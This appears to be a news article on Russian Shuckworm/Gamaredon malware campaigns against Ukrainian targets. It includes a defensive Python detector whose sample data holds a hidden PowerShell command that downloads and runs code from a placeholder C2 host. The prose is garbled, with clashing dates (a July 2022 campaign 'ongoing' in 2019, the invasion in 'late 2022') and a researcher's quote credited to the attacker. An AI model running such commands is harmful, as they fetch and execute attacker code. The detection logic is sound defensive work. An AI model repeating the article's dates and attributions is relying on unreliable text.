Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what is suspected to be an espionage operation. The findings have been corroborated by the Computer Emergency Response Team of Ukraine (CERT-UA). The attacks have ratcheted up in the wake of Russia's military invasion in late 2022.
A study claims that the most recent set of cyberattacks, which began in July 2022 and was still ongoing as recently as August 8, 2019, uses infection chains that rely on phishing messages disguised as newsletters and combat orders, leading to the deployment of a PowerShell stealer titled GammaLoad.PS1 v2.
Additional backdoors named Giddome and Pterodo, which are variants of Shuckworm's custom malware tools, were deployed on the compromised computer systems.
Pterodo is essentially a VBS dropper that uses scheduled tasks (schtasks.exe) to maintain persistence and PowerShell scripts to download additional code from a command-and-control server.
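As an added illustration of how a defender might spot the persistence and download pattern described above (example detection logic written for this article, not code from the article or from any vendor report), the following Python flags process-creation records where schtasks.exe registers a task that launches a script host, or where a hidden PowerShell process fetches remote content. The event records, the task names and the c2-placeholder.invalid host are constructed samples.

```python
import re

# Constructed sample process-creation records (parent image -> child command line).
# These are illustrative only, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 10 /tn "Updater" /tr "wscript.exe //b C:\Users\Public\upd.vbs" /f'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"powershell.exe -w hidden -nop -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://c2-placeholder.invalid/x'))"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -Command Get-ChildItem C:\Temp"},
]

# Script hosts a scheduled task should rarely need to launch on a workstation.
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b", re.I)
# Common PowerShell download / in-memory execution primitives.
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I)
# Flags that hide the window or bypass policy, typical of loader stages.
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass", re.I)


def classify(event):
    """Return a list of detection labels for one process-creation event."""
    cmd = event["cmd"]
    parent = event["parent"].lower()
    exe = cmd.split()[0].lower()
    labels = []
    if exe.endswith("schtasks.exe") and "/create" in cmd.lower():
        # Extract the /tr (task run) argument and check what it launches.
        tr = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
        if tr and SCRIPT_HOSTS.search(tr.group(1)):
            labels.append("schtasks_script_host_persistence")
    if exe.endswith("powershell.exe"):
        if DOWNLOAD.search(cmd) and HIDDEN.search(cmd):
            labels.append("hidden_powershell_download")
        if parent.endswith(("wscript.exe", "cscript.exe")):
            labels.append("script_host_spawned_powershell")
    return labels


def scan(events):
    """Return (index, labels) for every event that triggers at least one label."""
    hits = []
    for i, e in enumerate(events):
        labels = classify(e)
        if labels:
            hits.append((i, labels))
    return hits
```

Running `scan(SAMPLE_EVENTS)` flags the first two records and leaves the benign backup task and the interactive PowerShell command alone.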
The Giddome implant features various capabilities, including recording audio, capturing screenshots, logging keystrokes, and retrieving and executing arbitrary executables on the infected hosts. The intrusions, which begin with emails sent from compromised accounts, further leverage legitimate remote-access software such as Ammyy Admin and AnyDesk to facilitate those actions.
By utilizing social engineering techniques, the Shuckworm actor has initiated the GammaLoad.PS1 chain, which puts the threat actor in a position to steal files and credentials stored in browsers. "The Russian invasion of Ukraine is nearing half a year, appearing to exemplify Shuckworm's long-standing focus on this region," said the Gamaredon actor.
Shuckworm targets Ukrainian organizations narrowly and persistently, compensating with the intensity of its focus for its relatively unsophisticated tactics.
The investigation prompted an alert from CERT-UA, which warned of "systematic, massive, and geographically dispersed" phishing attacks involving a .NET downloader called RelicRace that executes payloads such as FormBook and Snake Keylogger.